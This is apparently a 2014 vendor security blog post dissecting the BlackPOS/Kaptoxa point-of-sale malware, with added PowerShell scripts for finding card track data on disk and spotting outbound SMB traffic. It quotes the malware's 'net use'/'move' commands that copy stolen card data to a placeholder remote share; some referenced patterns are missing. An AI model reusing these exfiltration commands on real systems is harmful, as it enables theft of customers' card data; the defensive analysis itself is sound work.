In the past year, we’ve heard about numerous major retailers getting hit by a series of different variants of malware designed to swipe their customers’ credit card information. Last week, I sat down with Anne Steiner and captured some of our thoughts on this matter. Today, I’m going to take that Q&A session we had down a level to where we discuss the technology that is causing this wave of cyber-theft.
To begin with, let’s discuss the attacks. In years past, you would typically hear about companies that leaked information from a central point. A good example: hackers would infiltrate a network and then go after the servers they could tell housed the critical databases of customer information. After taking control of that system, by whatever means, they would use various exfiltration mechanisms to send that data offsite all in one fell swoop.
The challenge with these types of attacks is that cyber-security has advanced over the years to make them more difficult. IT administrators first identify the “primary targets” on their networks where data is stored. Then they create various layers of security to prevent that data from being accessed from nodes that shouldn’t have access to it, while also putting IP-level security around it so that, if the data were compromised, it couldn’t freely flow off the server into the wrong hands. The gist is that it is increasingly difficult for hackers to find vulnerable servers and exploit them without detection.
The challenge with the most recent wave of attacks is that the hacking community has realized these attacks are difficult, and once again the law of governing dynamics for cyber-warfare has taken over. That law states:
1) Attacks will trend towards the most vulnerable machines on a network.
2) Attacks will trend towards the most vulnerable software on a network.
3) Attacks will trend towards the most valuable data on a network.
Taken together, these have forced a change in the way hackers go about exploiting vulnerabilities and getting data off of a network.
Fast-forward to the present day, where cyber security is a challenge. We have already discussed that most server administrators are securing servers with patching and various levels of anti-malware detection. The challenge is that the same security perimeter does not exist at most of the user endpoints on a network. In general, most of those endpoints don’t contain highly valuable data, unless you have specific knowledge of who you are hacking. In the retail sector, though, you know there are cash-register terminals (Point of Sale systems) out there handling the transactions with customers, and these nodes get interesting. In general, they are Microsoft Windows nodes running Point of Sale software, and they are collecting credit cards in over 97% of consumer transactions. This is where things get interesting for hackers.
Let me give you a non-technical description of the problem for a moment. Imagine I was a thief breaking into your home. I need to target you, but realistically, I don’t know who lives there and I just kind of brute force my way in. When I get inside, I start looking around for valuable stuff to steal. Maybe I see some good stuff, but for the really valuable stuff like jewelry, credit cards, money, or even electronics, I need to dig around a bit. It takes a while, right? In the case of retail, imagine the scenario is different… I want credit cards; I know they are generally at the point of sale systems, and I know where those are located in the store. I can get in, look for exactly what I want, and then get out.
This is the power of knowing your target and what you want to steal; you can get far more specific, and that’s what is fueling all of these attacks.
We’re going to take a step back for a moment and dissect a specific malware threat known as BlackPOS or Kaptoxa. This malware is specifically designed to run on Point of Sale systems, and it is further designed in a two-step process to steal the data without detection. We’ll talk about its approach and then how to protect yourself from it.
BASIC OPERATION OF KAPTOXA
First off, Kaptoxa has to make it onto your network. In general, the most direct route is an unsecured or unpatched machine through which hackers gain access to your network with some sort of elevated privileges. Once on the network, they spread Kaptoxa around using a number of freely available scripts from the internet that identify the Point-of-Sale (POS) systems and then infect them.
After infection, Kaptoxa operates as two different processes. The first attaches itself to the POS application and looks for credit card information; the second runs periodically, waking up to offload the captured information to external servers.
For the first process, Kaptoxa does something so simple and effective it’s scary. It attaches to the running POS process and reads its memory. During normal operation, the program reads credit card information in from a card swipe reader. This data follows an incredibly uniform pattern that resembles something like this:
However, this is the problem! The data is so uniform that if I can attach to a process and look at its memory, at some point a credit card track will be visible to me just by scanning the memory for a pattern like that. While that sounds tough, a rough scrape of that information can easily be done with a simple grep command and a parameter that looks like this:
So, now that Kaptoxa knows what data it is looking for, where to find it, and how to extract it from memory, the last thing it does is store it somewhere on the hard drive so it can be picked up later. Some of the early variants placed it right in the Windows System directory, in a falsely named DLL file, stored in plain text.
With the main process running, Kaptoxa constantly looks for more data to harvest and drops it into a directory to be sent off later; that file just continues to grow over time. The role of the second process is to wake up occasionally and move the data offsite. To date this process is again simplistic in its approach: it uses basic SMB/CIFS file-share mapping to connect a drive to a remote server that is set up for open sharing, copies the file, and then removes the share. While the approach has differed by variant, the command syntax will look something like:
net use L: \\<[X.X.X.X]>\c$\WINDOWS\twain_32 /user:<[User]> <[Password]>
move <Windows>\system32\winxml.dll L:\<[Machine Name]><[Day]><[Month]><[Hour]>.txt
net use L: /del
The script above connects a drive mapping called “L:” to a remote server, moves the file and then deletes the file share after it is done. A quick execution of this process later and the file is gone and your data has been extracted.
PROTECTING / DETECTING IN YOUR ENVIRONMENT
First off, I’d be remiss if I didn’t remind you that the malware compromised your network through a security flaw. If the systems had been protected, they wouldn’t have been compromised in the first place. The one thing to mention here is: don’t just protect your servers; your workstations need to be patched and managed too. At the same time, if it has already happened, you want to be prepared for that too.
In all the variants we’ve seen so far, there are two ways to protect yourself, each targeting a specific aspect of the malware. Let’s start with the process/memory thread. In that case, the simplest way to make sure you aren’t vulnerable is to make sure you don’t have card data on your POS hard drive or in the registry. There is a very simple way to take the regular expression I listed above, put it into a PowerShell script that scans your Windows files, and find the same signature Kaptoxa is looking for. If you find it on your hard drive, I promise you, if you are PCI compliant, it shouldn’t be there. You’re infected and should take immediate measures to shut down the remote nodes while you clean up the malware.
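Here is the kind of file scan the post recommends, written as an added example for this edit; it is not code from the post or from Shavlik. It assumes the ISO/IEC 7813 conventions for Track 1 (%B<PAN>^<NAME>^<YYMM>…) and Track 2 (;<PAN>=<YYMM>…), adds a Luhn check so random digit runs don’t trigger it, masks any PAN it reports, and builds a constructed sample dump under $env:TEMP so it can be run end to end; the file-name filter and the demo paths are assumptions.

```powershell
# Added example (not code from the original post or from Shavlik): scan files on a POS
# terminal for the magnetic-stripe track signature that Kaptoxa scrapes from memory and
# drops to disk. Track layouts are assumed from the ISO/IEC 7813 conventions:
#   Track 1: %B<PAN>^<NAME>^<YYMM>...    Track 2: ;<PAN>=<YYMM>...
# Paths, file names and the sample dump below are constructed for the demo.

$Track1 = '%B(\d{13,19})\^[^\^]{2,26}\^(\d{4})'   # group 1 = PAN, group 2 = expiry YYMM
$Track2 = ';(\d{13,19})=(\d{4})'                  # same groups for Track 2

function Test-Luhn {
    # Luhn mod-10 check: real PANs pass, most random digit runs do not (cuts false positives)
    param([string]$Digits)
    $sum = 0; $double = $false
    for ($i = $Digits.Length - 1; $i -ge 0; $i--) {
        $d = [int][string]$Digits[$i]          # cast via string, or you get the char code
        if ($double) { $d *= 2; if ($d -gt 9) { $d -= 9 } }
        $sum += $d
        $double = -not $double
    }
    return (($sum % 10) -eq 0)
}

function Find-TrackData {
    # Walks $Path and emits one object per Luhn-valid track hit, with the PAN masked
    param(
        [string]$Path,
        [string[]]$Include = @('*.dll', '*.txt', '*.dat', '*.log')   # assumed file types
    )
    $files = Get-ChildItem -Path $Path -Recurse -File -Include $Include -ErrorAction SilentlyContinue
    foreach ($file in $files) {
        # Early variants stored the dump in plain text, so a text read is enough here
        $text = [System.IO.File]::ReadAllText($file.FullName)
        foreach ($pattern in @($Track1, $Track2)) {
            foreach ($m in [regex]::Matches($text, $pattern)) {
                $pan = $m.Groups[1].Value
                if (-not (Test-Luhn $pan)) { continue }
                [pscustomobject]@{
                    File   = $file.FullName
                    Offset = $m.Index
                    # Never write full PANs into your own findings: keep first 6 / last 4 only
                    PAN    = $pan.Substring(0, 6) + ('*' * ($pan.Length - 10)) + $pan.Substring($pan.Length - 4)
                    Expiry = $m.Groups[2].Value
                }
            }
        }
    }
}

# --- constructed demo: a fake plain-text dump named like the early winxml.dll drop ---
$demoDir = Join-Path $env:TEMP 'kaptoxa-scan-demo'
New-Item -ItemType Directory -Path $demoDir -Force | Out-Null
$sample = @(
    ';4111111111111111=25121010000000000?'   # well-known test PAN, passes Luhn
    ';4111111111111112=25121010000000000?'   # last digit changed, fails Luhn, must not be reported
) -join "`r`n"
Set-Content -Path (Join-Path $demoDir 'winxml.dll') -Value $sample -NoNewline

Find-TrackData -Path $demoDir | Format-Table -AutoSize
```

Run against the constructed dump, the scan reports a single hit (the masked test PAN with expiry 2512) and ignores the line that fails the Luhn check. On a real terminal, point -Path at the system drive and the POS application directory; anything this finds is out of scope for PCI and, per the post, a sign the node should be isolated.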
The second prevention method is more of a network approach: barring specific reasons, there shouldn’t be any reason for one of your POS systems to attach a network drive to an off-company IP address. To put a hard stop on this, a brute-force deny rule can be added to your firewall, with alerting, using the general format of:
To: External IP
If you are looking for a less-invasive rule, I’d suggest country filters for this SMB/CIFS traffic.
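The deny rule above is the hard stop; the added example below is the detection side, written for this edit and not code from the post or from Shavlik. It reviews Windows Firewall log lines for POS terminals opening outbound SMB/CIFS (TCP 445/139) sessions to non-private addresses. The log lines are constructed in the pfirewall.log W3C format, and the POS subnet prefix and the IP addresses (RFC 5737 documentation ranges) are assumptions.

```powershell
# Added example (not code from the original post or from Shavlik): find POS hosts that
# opened SMB/CIFS sessions to addresses outside the company, from Windows Firewall log lines.
# Sample lines are constructed in the pfirewall.log format; the POS VLAN prefix and the
# IP addresses (RFC 5737 documentation ranges) are assumptions for the demo.

function Test-PrivateAddress {
    # RFC 1918 ranges plus loopback; anything else is treated as "external"
    param([string]$Ip)
    $o = $Ip.Split('.') | ForEach-Object { [int]$_ }
    if ($o.Count -ne 4) { return $false }
    return (($o[0] -eq 10) -or
            ($o[0] -eq 172 -and $o[1] -ge 16 -and $o[1] -le 31) -or
            ($o[0] -eq 192 -and $o[1] -eq 168) -or
            ($o[0] -eq 127))
}

function Find-ExternalSmb {
    # Emits one object per outbound TCP 445/139 connection from a POS host to a non-private IP
    param(
        [string[]]$LogLines,
        [string]$PosPrefix = '10.10.5.'     # assumed POS VLAN
    )
    foreach ($line in $LogLines) {
        if ([string]::IsNullOrWhiteSpace($line) -or $line.StartsWith('#')) { continue }
        # Fields: date time action protocol src-ip dst-ip src-port dst-port ... path
        $f = $line -split '\s+'
        if ($f.Count -lt 8 -or $f[3] -ne 'TCP') { continue }
        $src = $f[4]; $dst = $f[5]; $dstPort = [int]$f[7]
        if ($dstPort -notin @(445, 139)) { continue }      # only SMB/CIFS ports
        if (-not $src.StartsWith($PosPrefix)) { continue } # only POS terminals
        if (Test-PrivateAddress $dst) { continue }         # internal file servers are expected
        [pscustomobject]@{
            When    = "$($f[0]) $($f[1])"
            Action  = $f[2]
            Source  = $src
            Dest    = $dst
            DstPort = $dstPort
        }
    }
}

# --- constructed sample in Windows Firewall (pfirewall.log) format ---
$sampleLog = @'
#Version: 1.5
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2014-09-30 02:13:07 ALLOW TCP 10.10.5.23 10.10.1.4 49211 445 0 S 0 0 0 - - - SEND
2014-09-30 02:13:09 ALLOW TCP 10.10.5.23 203.0.113.45 49213 445 0 S 0 0 0 - - - SEND
2014-09-30 02:13:11 ALLOW TCP 10.10.5.41 198.51.100.7 49301 139 0 S 0 0 0 - - - SEND
2014-09-30 02:13:15 ALLOW TCP 10.10.5.23 203.0.113.45 49214 443 0 S 0 0 0 - - - SEND
2014-09-30 02:13:20 ALLOW UDP 10.10.5.23 10.10.1.1 51234 53 0 - - - - - - - SEND
'@ -split "`r?`n"

Find-ExternalSmb -LogLines $sampleLog | Format-Table -AutoSize
```

On the constructed sample only the two sessions to 203.0.113.45:445 and 198.51.100.7:139 are reported; the connection to the internal file server, the HTTPS session and the DNS query are all filtered out. To review a live log, pass Get-Content of the firewall log (by default $env:SystemRoot\System32\LogFiles\Firewall\pfirewall.log, with logging of allowed connections enabled) as -LogLines, and adjust -PosPrefix to your own POS subnet.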
NOT JUST RETAIL – THE STRING AHEAD
So, let me just say this blog isn’t just for retail. What started as stealing card swipes is proliferating into variants that haven’t been successful yet but are beginning to come together to steal banking data, financial records, health insurance/patient information and other types of structured data. We can expect this threat to evolve rapidly in 2014/2015, and everyone should implement best practices to:
1) Prevent threats from getting on their network by protecting Servers AND WORKSTATIONS with patching and anti-malware technologies
2) Prevent data theft by implementing more specific rules on key areas and equipment on their network to block data exfiltration.
If you’d like to learn more about recent security breaches, what companies can do to defend their networks, and what consumers can do to protect themselves, please join us for the following Shavlik webinar.
Security Breaches Everywhere – Help your company stay out of the headlines
Thursday, October 2, 2014 10:00 am CDT